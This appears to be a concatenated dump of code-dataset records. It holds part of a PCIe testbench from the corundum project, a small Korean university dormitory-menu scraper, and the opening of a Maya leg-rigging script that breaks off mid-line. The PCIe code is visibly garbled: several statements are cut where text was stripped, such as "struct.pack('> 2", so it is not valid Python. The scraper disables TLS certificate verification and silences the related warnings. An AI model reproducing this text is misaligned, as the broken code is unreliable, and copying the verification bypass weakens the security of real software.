mask & (1 << k):\n if start_offset is 
None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = yield from self.read_io_region(addr+start_offset, offset-start_offset)\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n data[start_offset:offset] = yield from self.read_io_region(addr+start_offset, offset-start_offset)\n\n cpl.set_data(data)\n cpl.byte_count = 4\n cpl.length = 1\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any regions\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, PcieId(0, 0, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_io_write_tlp(self, tlp):\n if self.find_io_region(tlp.address):\n # logging\n print(\"[%s] IO write\" % (highlight(self.get_desc())))\n\n assert tlp.length == 1\n\n # prepare completion TLP\n cpl = TLP()\n cpl.set_completion(tlp, PcieId(0, 0, 0))\n\n addr = tlp.address\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # perform write\n data = tlp.get_data()\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n yield from self.write_io_region(addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n yield from self.write_io_region(addr+start_offset, data[start_offset:offset])\n\n cpl.byte_count = 4\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n else:\n # logging\n print(\"IO request did not match any regions\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, PcieId(0, 0, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_read_tlp(self, tlp):\n if self.find_region(tlp.address):\n # logging\n print(\"[%s] Memory read\" % (highlight(self.get_desc())))\n\n # perform operation\n addr = tlp.address\n offset = 0\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform read\n data = yield from self.read_region(addr, tlp.length*4)\n\n # prepare completion TLP(s)\n m = 0\n n = 0\n addr = tlp.address+tlp.get_first_be_offset()\n dw_length = tlp.length\n byte_length = tlp.get_be_byte_count()\n\n while m < dw_length:\n cpl = TLP()\n cpl.set_completion_data(tlp, PcieId(0, 0, 0))\n\n cpl_dw_length = dw_length - m\n cpl_byte_length = byte_length - n\n cpl.byte_count = cpl_byte_length\n if cpl_dw_length > 32 << self.max_payload_size:\n cpl_dw_length = 32 << self.max_payload_size # max payload size\n cpl_dw_length -= (addr & 0x7c) >> 2 # RCB align\n\n cpl.lower_address = addr & 0x7f\n\n cpl.set_data(data[m*4:(m+cpl_dw_length)*4])\n\n # logging\n print(\"[%s] Completion: %s\" % (highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n m += cpl_dw_length;\n n += cpl_dw_length*4 - (addr&3)\n addr += cpl_dw_length*4 - (addr&3)\n\n else:\n # logging\n print(\"Memory request did not match any regions\")\n\n # Unsupported request\n cpl = TLP()\n cpl.set_ur_completion(tlp, PcieId(0, 0, 0))\n # logging\n print(\"[%s] UR Completion: %s\" % 
(highlight(self.get_desc()), repr(cpl)))\n yield from self.send(cpl)\n\n def handle_mem_write_tlp(self, tlp):\n if self.find_region(tlp.address):\n # logging\n print(\"[%s] Memory write\" % (highlight(self.get_desc())))\n\n # perform operation\n addr = tlp.address\n offset = 0\n start_offset = None\n mask = tlp.first_be\n\n # check for 4k boundary crossing\n if tlp.length*4 > 0x1000 - (addr & 0xfff):\n print(\"Request crossed 4k boundary, discarding request\")\n return\n\n # perform write\n data = tlp.get_data()\n\n # first dword\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n yield from self.write_region(addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if tlp.length > 2:\n # middle dwords\n if start_offset is None:\n start_offset = offset\n offset += (tlp.length-2)*4\n\n if tlp.length > 1:\n # last dword\n mask = tlp.last_be\n\n for k in range(4):\n if mask & (1 << k):\n if start_offset is None:\n start_offset = offset\n else:\n if start_offset is not None and offset != start_offset:\n yield from self.write_region(addr+start_offset, data[start_offset:offset])\n start_offset = None\n\n offset += 1\n\n if start_offset is not None and offset != start_offset:\n yield from self.write_region(addr+start_offset, data[start_offset:offset])\n\n # memory writes are posted, so don't send a completion\n\n else:\n # logging\n print(\"Memory request did not match any regions\")\n\n def config_read(self, dev, addr, length, timeout=0):\n n = 0\n data = b''\n\n while n < length:\n tlp = TLP()\n tlp.fmt_type = TLP_CFG_READ_1\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.tag = self.get_free_tag()\n tlp.dest_id = dev\n\n first_pad = addr % 4\n byte_length = min(length-n, 4-first_pad)\n tlp.set_be(addr, byte_length)\n\n tlp.register_number = addr >> 2\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl or cpl.status != CPL_STATUS_SC:\n d = b'\\xff\\xff\\xff\\xff'\n else:\n assert cpl.length == 1\n d = struct.pack('> 2\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n n += byte_length\n addr += byte_length\n\n def config_write_words(self, dev, addr, data, ws=2, timeout=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.config_write(dev, addr, data, timeout)\n\n def config_write_dwords(self, dev, addr, data, timeout=0):\n yield from self.config_write_words(dev, addr, data, 4, timeout)\n\n def config_write_qwords(self, dev, addr, data, timeout=0):\n yield from self.config_write_words(dev, addr, data, 8, timeout)\n\n def config_write_byte(self, dev, addr, data, timeout=0):\n yield from self.config_write(dev, addr, [data], timeout)\n\n def config_write_word(self, dev, addr, data, timeout=0):\n yield from self.config_write_words(dev, addr, [data], timeout=timeout)\n\n def config_write_dword(self, dev, addr, data, timeout=0):\n yield from self.config_write_dwords(dev, addr, [data], timeout=timeout)\n\n def config_write_qword(self, dev, addr, data, timeout=0):\n yield from self.config_write_qwords(dev, addr, [data], timeout=timeout)\n\n def capability_read(self, dev, cap_id, addr, length, timeout=0):\n ti = self.tree.find_dev(dev)\n\n if not ti:\n raise Exception(\"Device not found\")\n\n offset = ti.get_capability_offset(cap_id)\n\n if not offset:\n raise Exception(\"Capability not found\")\n\n val = yield from 
self.config_read(dev, addr+offset, length, timeout)\n return val\n\n def capability_read_words(self, dev, cap_id, addr, count, ws=2, timeout=0):\n assert ws in (1, 2, 4, 8)\n data = yield from self.capability_read(dev, cap_id, addr, count*ws, timeout)\n words = []\n for k in range(count):\n words.append(int.from_bytes(data[ws*k:ws*(k+1)], 'little'))\n return words\n\n def capability_read_dwords(self, dev, cap_id, addr, count, timeout=0):\n data = yield from self.capability_read_words(dev, cap_id, addr, count, 4, timeout)\n return data\n\n def capability_read_qwords(self, dev, cap_id, addr, count, timeout=0):\n data = yield from self.capability_read_words(dev, cap_id, addr, count, 8, timeout)\n return data\n\n def capability_read_byte(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read(dev, cap_id, addr, 1, timeout)\n return data[0]\n\n def capability_read_word(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read_words(dev, cap_id, addr, 1, timeout=timeout)\n return data[0]\n\n def capability_read_dword(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read_dwords(dev, cap_id, addr, 1, timeout=timeout)\n return data[0]\n\n def capability_read_qword(self, dev, cap_id, addr, timeout=0):\n data = yield from self.capability_read_qwords(dev, cap_id, addr, 1, timeout=timeout)\n return data[0]\n\n def capability_write(self, dev, cap_id, addr, data, timeout=0):\n ti = self.tree.find_dev(dev)\n\n if not ti:\n raise Exception(\"Device not found\")\n\n offset = ti.get_capability_offset(cap_id)\n\n if not offset:\n raise Exception(\"Capability not found\")\n\n yield from self.config_write(dev, addr+offset, data, timeout)\n\n def capability_write_words(self, dev, cap_id, addr, data, ws=2, timeout=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.capability_write(dev, cap_id, addr, data, timeout)\n\n def capability_write_dwords(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_words(dev, cap_id, addr, data, 4, timeout)\n\n def capability_write_qwords(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_words(dev, cap_id, addr, data, 8, timeout)\n\n def capability_write_byte(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write(dev, cap_id, addr, [data], timeout)\n\n def capability_write_word(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_words(dev, cap_id, addr, [data], timeout=timeout)\n\n def capability_write_dword(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_dwords(dev, cap_id, addr, [data], timeout=timeout)\n\n def capability_write_qword(self, dev, cap_id, addr, data, timeout=0):\n yield from self.capability_write_qwords(dev, cap_id, addr, [data], timeout=timeout)\n\n def io_read(self, addr, length, timeout=0):\n n = 0\n data = b''\n\n if self.find_region(addr):\n val = yield from self.read_io_region(addr, length)\n return val\n\n while n < length:\n tlp = TLP()\n tlp.fmt_type = TLP_IO_READ\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.tag = self.get_free_tag()\n\n first_pad = addr % 4\n byte_length = min(length-n, 4-first_pad)\n tlp.set_be(addr, byte_length)\n\n yield from self.send(tlp)\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.length == 1\n d = 
struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_READ_64\n else:\n tlp.fmt_type = TLP_MEM_READ\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.tag = self.get_free_tag()\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = length-n\n byte_length = min(byte_length, (128 << self.max_read_request_size)-first_pad) # max read request size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be(addr, byte_length)\n\n yield from self.send(tlp)\n\n m = 0\n\n while m < byte_length:\n cpl = yield from self.recv_cpl(tlp.tag, timeout)\n\n if not cpl:\n raise Exception(\"Timeout\")\n if cpl.status != CPL_STATUS_SC:\n raise Exception(\"Unsuccessful completion\")\n else:\n assert cpl.byte_count+3+(cpl.lower_address&3) >= cpl.length*4\n assert cpl.byte_count == byte_length - m\n\n d = bytearray()\n\n for k in range(cpl.length):\n d.extend(struct.pack(' 0xffffffff:\n tlp.fmt_type = TLP_MEM_WRITE_64\n else:\n tlp.fmt_type = TLP_MEM_WRITE\n tlp.requester_id = PcieId(0, 0, 0)\n tlp.attr = attr\n tlp.tc = tc\n\n first_pad = addr % 4\n byte_length = len(data)-n\n byte_length = min(byte_length, (128 << self.max_payload_size)-first_pad) # max payload size\n byte_length = min(byte_length, 0x1000 - (addr & 0xfff)) # 4k align\n tlp.set_be_data(addr, data[n:n+byte_length])\n\n yield from self.send(tlp)\n\n n += byte_length\n addr += byte_length\n\n def mem_write_words(self, addr, data, ws=2, timeout=0, attr=0, tc=0):\n assert ws in (1, 2, 4, 8)\n words = data\n data = b''\n for w in words:\n data += w.to_bytes(ws, 'little')\n yield from self.mem_write(addr, data, timeout, attr, tc)\n\n def mem_write_dwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 4, timeout, attr, tc)\n\n def mem_write_qwords(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, data, 8, timeout, attr, tc)\n\n def mem_write_byte(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write(addr, [data], timeout, attr, tc)\n\n def mem_write_word(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_words(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_dword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_dwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def mem_write_qword(self, addr, data, timeout=0, attr=0, tc=0):\n yield from self.mem_write_qwords(addr, [data], timeout=timeout, attr=attr, tc=tc)\n\n def msi_region_read(self, addr, length):\n return b'\\x00'*length\n\n def msi_region_write(self, addr, data):\n assert addr == 0\n assert len(data) == 4\n number = struct.unpack('> 23 & 1\n msi_mmcap = msg_ctrl >> 17 & 7\n\n # message address\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 4, self.msi_addr & 0xfffffffc)\n\n if msi_64bit:\n # 64 bit message address\n # message upper address\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 8, (self.msi_addr >> 32) & 0xffffffff)\n # message data\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 12, self.msi_msg_limit)\n\n else:\n # 32 bit message address\n # message data\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 8, self.msi_msg_limit)\n\n # enable and set enabled messages\n yield from self.capability_write_dword(dev, MSI_CAP_ID, 0, (msg_ctrl & ~(7 << 20)) | 1 << 16 | msi_mmcap << 20)\n\n ti.msi_addr = self.msi_addr\n ti.msi_data = self.msi_msg_limit\n\n for k in range(32):\n self.msi_signals[self.msi_msg_limit] = [Signal(bool(0))]\n 
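# per-vector bookkeeping: each MSI message-data value gets a list of Signals to toggle and a list of callbacks to invoke; msi_msg_limit doubles as the next free message-data value, so 32 consecutive values are reserved for this device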
self.msi_callbacks[self.msi_msg_limit] = []\n self.msi_msg_limit += 1\n\n return True\n\n def msi_get_signal(self, dev, number=0):\n if not self.tree:\n return None\n ti = self.tree.find_dev(dev)\n if not ti:\n return None\n if ti.msi_data is None:\n return None\n if ti.msi_data+number not in self.msi_signals:\n return None\n return self.msi_signals[ti.msi_data+number][0]\n\n def msi_register_signal(self, dev, sig, number=0):\n if not self.tree:\n return\n ti = self.tree.find_dev(dev)\n if not ti:\n return\n if ti.msi_data is None:\n return\n if ti.msi_data+number not in self.msi_signals:\n return\n self.msi_signals[ti.msi_data+number].append(sig)\n\n def msi_register_callback(self, dev, callback, number=0):\n if not self.tree:\n return\n ti = self.tree.find_dev(dev)\n if not ti:\n return\n if ti.msi_data is None:\n return\n if ti.msi_data+number not in self.msi_callbacks:\n return\n self.msi_callbacks[ti.msi_data+number].append(callback)\n\n def enumerate_segment(self, tree, bus, timeout=1000, enable_bus_mastering=False, configure_msi=False):\n sec_bus = bus+1\n sub_bus = bus\n\n tree.sec_bus_num = bus\n\n # align limits against bridge registers\n self.io_limit = align(self.io_limit, 0xfff)\n self.mem_limit = align(self.mem_limit, 0xfffff)\n self.prefetchable_mem_limit = align(self.prefetchable_mem_limit, 0xfffff)\n\n tree.io_base = self.io_limit\n tree.io_limit = self.io_limit\n tree.mem_base = self.mem_limit\n tree.mem_limit = self.mem_limit\n tree.prefetchable_mem_base = self.prefetchable_mem_limit\n tree.prefetchable_mem_limit = self.prefetchable_mem_limit\n\n # logging\n print(\"[%s] Enumerating bus %d\" % (highlight(self.get_desc()), bus))\n\n for d in range(32):\n if bus == 0 and d == 0:\n continue\n\n # read vendor ID and device ID\n val = yield from self.config_read_dword(PcieId(bus, d, 0), 0x000, timeout)\n\n if val is None or val == 0xffffffff:\n continue\n\n # valid vendor ID\n # logging\n print(\"[%s] Found device at %02x:%02x.%x\" % (highlight(self.get_desc()), bus, d, 0))\n\n fc = 1\n\n # read type\n val = yield from self.config_read_byte(PcieId(bus, d, 0), 0x00e, timeout)\n\n if val & 0x80:\n # multifunction device\n fc = 8\n\n for f in range(fc):\n # read vendor ID and device ID\n val = yield from self.config_read(PcieId(bus, d, f), 0x000, 4, timeout)\n\n if val is None or val == b'\\xff\\xff\\xff\\xff':\n continue\n\n ti = TreeItem()\n tree.children.append(ti)\n ti.bus_num = bus\n ti.device_num = d\n ti.function_num = f\n ti.vendor_id, ti.device_id = struct.unpack('= bar_cnt-1:\n raise Exception(\"Invalid BAR configuration\")\n\n # read adjacent BAR\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+(bar+1)*4, 0xffffffff)\n val2 = yield from self.config_read_dword(PcieId(bus, d, f), 0x010+(bar+1)*4)\n val |= val2 << 32\n mask = (~val & 0xffffffffffffffff) | 15\n size = mask + 1\n # logging\n print(\"[%s] %02x:%02x.%x (64-bit) Mem BAR%d raw: %016x, mask: %016x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, mask, size))\n\n if val & 8:\n # prefetchable\n # align and allocate\n self.prefetchable_mem_limit = align(self.prefetchable_mem_limit, mask)\n val = val & 15 | self.prefetchable_mem_limit\n self.prefetchable_mem_limit += size\n\n else:\n # not-prefetchable\n # logging\n print(\"[%s] %02x:%02x.%x (64-bit) Mem BAR%d marked non-prefetchable, allocating from 32-bit non-prefetchable address space\" % (highlight(self.get_desc()), bus, d, f, bar))\n # align and allocate\n self.mem_limit = align(self.mem_limit, mask)\n val = val & 15 | 
self.mem_limit\n self.mem_limit += size\n\n ti.bar[bar] = val\n ti.bar_size[bar] = size\n\n # logging\n print(\"[%s] %02x:%02x.%x (64-bit) Mem BAR%d Allocation: %016x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, size))\n\n # write BAR\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+bar*4, val & 0xffffffff)\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+(bar+1)*4, (val >> 32) & 0xffffffff)\n\n bar += 2\n else:\n # 32 bit BAR\n mask = (~val & 0xffffffff) | 15\n size = mask + 1\n # logging\n print(\"[%s] %02x:%02x.%x (32-bit) Mem BAR%d raw: %08x, mask: %08x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, mask, size))\n\n if val & 8:\n # prefetchable\n # logging\n print(\"[%s] %02x:%02x.%x (32-bit) Mem BAR%d marked prefetchable, but allocating as non-prefetchable\" % (highlight(self.get_desc()), bus, d, f, bar))\n\n # align and allocate\n self.mem_limit = align(self.mem_limit, mask)\n val = val & 15 | self.mem_limit\n self.mem_limit += size\n\n ti.bar[bar] = val\n ti.bar_size[bar] = size\n\n # logging\n print(\"[%s] %02x:%02x.%x (32-bit) Mem BAR%d Allocation: %08x, size: %d\" % (highlight(self.get_desc()), bus, d, f, bar, val, size))\n\n # write BAR\n yield from self.config_write_dword(PcieId(bus, d, f), 0x010+bar*4, val)\n\n bar += 1\n\n # logging\n print(\"[%s] Walk capabilities of %02x:%02x.%x\" % (highlight(self.get_desc()), bus, d, f))\n\n # walk capabilities\n ptr = yield from self.config_read_byte(PcieId(bus, d, f), 0x34)\n ptr = ptr & 0xfc\n\n while ptr > 0:\n val = yield from self.config_read(PcieId(bus, d, f), ptr, 2)\n # logging\n print(\"[%s] Found capability 0x%02x at offset 0x%02x, next ptr 0x%02x\" % (highlight(self.get_desc()), val[0], ptr, val[1] & 0xfc))\n ti.capabilities.append((val[0], ptr))\n ptr = val[1] & 0xfc\n\n # walk extended capabilities\n # TODO\n\n # set max payload size, max read request size, and extended tag enable\n dev_cap = yield from self.capability_read_dword(PcieId(bus, d, f), PCIE_CAP_ID, 4)\n dev_ctrl_sta = yield from self.capability_read_dword(PcieId(bus, d, f), PCIE_CAP_ID, 8)\n\n max_payload = min(0x5, min(self.max_payload_size, dev_cap & 7))\n ext_tag = bool(self.extended_tag_field_enable and (dev_cap & (1 << 5)))\n max_read_req = min(0x5, self.max_read_request_size)\n\n new_dev_ctrl = dev_ctrl_sta & 0x00008e1f | (max_payload << 5) | (ext_tag << 8) | (max_read_req << 12)\n\n yield from self.capability_write_dword(PcieId(bus, d, f), PCIE_CAP_ID, 8, new_dev_ctrl)\n\n if enable_bus_mastering:\n # enable bus mastering\n val = yield from self.config_read_word(PcieId(bus, d, f), 0x04)\n yield from self.config_write_word(PcieId(bus, d, f), 0x04, val | 4)\n\n if configure_msi:\n # configure MSI\n yield from self.configure_msi(PcieId(bus, d, f))\n\n if bridge:\n # set bridge registers for enumeration\n # logging\n print(\"[%s] Set pri %d, sec %d, sub %d\" % (highlight(self.get_desc()), bus, sec_bus, 255))\n\n yield from self.config_write(PcieId(bus, d, f), 0x018, bytearray([bus, sec_bus, 255]))\n\n # enumerate secondary bus\n sub_bus = yield from self.enumerate_segment(tree=ti, bus=sec_bus, timeout=timeout, enable_bus_mastering=enable_bus_mastering, configure_msi=configure_msi)\n\n # finalize bridge configuration\n # logging\n print(\"[%s] Set pri %d, sec %d, sub %d\" % (highlight(self.get_desc()), bus, sec_bus, sub_bus))\n\n yield from self.config_write(PcieId(bus, d, f), 0x018, bytearray([bus, sec_bus, sub_bus]))\n\n # set base/limit registers\n # logging\n print(\"[%s] Set IO base: %08x, 
limit: %08x\" % (highlight(self.get_desc()), ti.io_base, ti.io_limit))\n\n yield from self.config_write(PcieId(bus, d, f), 0x01C, struct.pack('BB', (ti.io_base >> 8) & 0xf0, (ti.io_limit >> 8) & 0xf0))\n yield from self.config_write(PcieId(bus, d, f), 0x030, struct.pack('> 16, ti.io_limit >> 16))\n\n # logging\n print(\"[%s] Set mem base: %08x, limit: %08x\" % (highlight(self.get_desc()), ti.mem_base, ti.mem_limit))\n\n yield from self.config_write(PcieId(bus, d, f), 0x020, struct.pack('> 16) & 0xfff0, (ti.mem_limit >> 16) & 0xfff0))\n\n # logging\n print(\"[%s] Set prefetchable mem base: %016x, limit: %016x\" % (highlight(self.get_desc()), ti.prefetchable_mem_base, ti.prefetchable_mem_limit))\n\n yield from self.config_write(PcieId(bus, d, f), 0x024, struct.pack('> 16) & 0xfff0, (ti.prefetchable_mem_limit >> 16) & 0xfff0))\n yield from self.config_write(PcieId(bus, d, f), 0x028, struct.pack('> 32))\n yield from self.config_write(PcieId(bus, d, f), 0x02c, struct.pack('> 32))\n\n sec_bus = sub_bus+1\n\n tree.sub_bus_num = sub_bus\n\n # align limits against bridge registers\n self.io_limit = align(self.io_limit, 0xfff)\n self.mem_limit = align(self.mem_limit, 0xfffff)\n self.prefetchable_mem_limit = align(self.prefetchable_mem_limit, 0xfffff)\n\n tree.io_limit = self.io_limit-1\n tree.mem_limit = self.mem_limit-1\n tree.prefetchable_mem_limit = self.prefetchable_mem_limit-1\n\n # logging\n print(\"[%s] Enumeration of bus %d complete\" % (highlight(self.get_desc()), bus))\n\n return sub_bus\n\n def enumerate(self, timeout=1000, enable_bus_mastering=False, configure_msi=False):\n # logging\n print(\"[%s] Enumerating bus\" % (highlight(self.get_desc())))\n\n self.io_limit = self.io_base\n self.mem_limit = self.mem_base\n self.prefetchable_mem_limit = self.prefetchable_mem_base\n\n self.tree = TreeItem()\n yield from self.enumerate_segment(tree=self.tree, bus=0, timeout=timeout, enable_bus_mastering=enable_bus_mastering, configure_msi=configure_msi)\n\n self.upstream_bridge.io_base = self.io_base\n self.upstream_bridge.io_limit = self.io_limit\n self.upstream_bridge.mem_base = self.mem_base\n self.upstream_bridge.mem_limit = self.mem_limit\n self.upstream_bridge.prefetchable_mem_base = self.prefetchable_mem_base\n self.upstream_bridge.prefetchable_mem_limit = self.prefetchable_mem_limit\n\n # logging\n print(\"[%s] Enumeration complete\" % (highlight(self.get_desc())))\n\n # logging\n print(\"Device tree:\")\n print(self.tree.to_str().strip())\n\n","repo_name":"corundum/corundum","sub_path":"fpga/lib/pcie/tb/pcie.py","file_name":"pcie.py","file_ext":"py","file_size_in_byte":180598,"program_lang":"python","lang":"en","doc_type":"code","stars":1336,"dataset":"github-code","pt":"3"} +{"seq_id":"39365218547","text":"from urllib import response\nfrom flask import Flask, json, request, jsonify\nimport sys\nfrom queue import Empty\nimport requests,re\nfrom bs4 import BeautifulSoup\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\n\nurl = 'https://tu.ac.kr/dormitory/index.do'\n\nresponse = requests.get(url, verify=False)\nif response.status_code == 200:\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n try:\n alert = soup.select(\"li.item\")\n except:\n print('식단 업데이트가 되지 않는 날입니다.')\n string = ''\n for i in alert:\n string += i.get_text()\n print(string.strip())\nelse:\n print('학교 홈페이지 문제 
발생')","repo_name":"SeungHoonJeon/School-Cafeteria-Bot","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15636844211","text":"#Alejandro Munoz Medina\n\n#Complete prebehavior script for pants' pantss with no roll and manipulators\n\nimport maya.cmds as mc\n\ndef patch():\n\n import maya.cmds as mc\n\n def main():\n\n import maya.cmds as mc\n\n #######################################\n ############### No Roll ###############\n #######################################\n\n # no twist joints\n\n # ankle\n\n def ankleNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n frLegTip = (\"%s_leg_02_tip_twist\" % side)\n\n # create control for the attibutes and prep it\n attrControl = \"%s_leg_SW_ctrl\" % side\n\n # add attribute(s) to the new control:\n\n mc.addAttr(attrControl, at=\"enum\", en='sleeveRoll',\n sn=\"sep21\",\n ln=\"__________________\",\n k=False, h=False)\n mc.setAttr('%s.sep21' % attrControl, cb=True)\n\n # add attribute(s) to the new control:\n mc.addAttr(attrControl, at=\"bool\", sn=\"%s_nr\" % side, ln=\"%s_no_roll\" % side,\n max=1.0, min=0.0, dv=1.0, k=True, h=False)\n\n # create the no twist joint\n frLegNtTip = mc.duplicate(frLegTip, n=\"%s_leg_02_tip_no_twist\" % side)\n\n # refer to hip\n hip = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender = mc.createNode(\"blendTwoAttr\", n=\"%s_ankle_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip, \"%s.rz\" % frLegNtTip[0])\n mc.connectAttr(\"%s.rz\" % frLegTip, \"%s.input[0]\" % blender)\n mc.connectAttr(\"%s.rz\" % frLegNtTip[0], \"%s.input[1]\" % blender)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl, side), \"%s.ab\" % blender, f=True)\n\n # foreleg\n\n def forelegNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n frLeg = (\"%s_leg_02_bend_twist\" % side)\n\n # refer to attribute control\n attrControl1 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n frLegNt = mc.duplicate(frLeg, n=\"%s_leg_02_bend_no_twist\" % side)\n\n # refer to hip\n hip1 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender1 = mc.createNode(\"blendTwoAttr\", n=\"%s_foreleg_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip1, \"%s.rz\" % frLegNt[0])\n mc.connectAttr(\"%s.rz\" % frLeg, \"%s.input[0]\" % blender1)\n mc.connectAttr(\"%s.rz\" % frLegNt[0], \"%s.input[1]\" % blender1)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl1, side), \"%s.ab\" % blender1, f=True)\n\n # knee (front)\n\n def kneeFrontNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n kneeFrnt = (\"%s_leg_02_base_twist\" % side)\n\n # refer to attribute control\n attrControl2 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n kneeFrntNt = mc.duplicate(kneeFrnt, n=\"%s_leg_02_base_no_twist\" % side)\n\n # refer to hip\n hip2 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender2 = mc.createNode(\"blendTwoAttr\", n=\"%s_kneeBack_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip2, \"%s.rz\" % kneeFrntNt[0])\n mc.connectAttr(\"%s.rz\" % kneeFrnt, \"%s.input[0]\" % blender2)\n mc.connectAttr(\"%s.rz\" % kneeFrntNt[0], \"%s.input[1]\" % blender2)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl2, side), \"%s.ab\" % blender2, f=True)\n\n # knee (back)\n\n def kneeBackNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n kneebck = (\"%s_leg_01_tip_twist\" % 
side)\n\n # refer to attribute control\n attrControl3 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n kneebckNt = mc.duplicate(kneebck, n=\"%s_leg_01_tip_no_twist\" % side)\n\n # refer to hip\n hip3 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender3 = mc.createNode(\"blendTwoAttr\", n=\"%s_kneeFrnt_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip3, \"%s.rz\" % kneebckNt[0])\n mc.connectAttr(\"%s.rz\" % kneebck, \"%s.input[0]\" % blender3)\n mc.connectAttr(\"%s.rz\" % kneebckNt[0], \"%s.input[1]\" % blender3)\n mc.connectAttr(\"%s.%s_nr\" % (attrControl3, side), \"%s.ab\" % blender3, f=True)\n\n # upperleg\n\n def upperlegNoTwist(side):\n\n import maya.cmds as mc\n\n # joint in question\n upperleg = (\"%s_leg_01_bend_twist\" % side)\n\n # refer to attribute control\n attrControl4 = (\"%s_leg_SW_ctrl\" % side)\n\n # create the no twist joint\n upperlegNt = mc.duplicate(upperleg, n=\"%s_leg_01_bend_no_twist\" % side)\n\n # refer to hip\n hip4 = (\"%s_leg_01_twist\" % side)\n\n # create blender\n blender4 = mc.createNode(\"blendTwoAttr\", n=\"%s_upperleg_twist_choice_bta\" % side)\n\n # connect them\n mc.connectAttr(\"%s.twistZ\" % hip4, 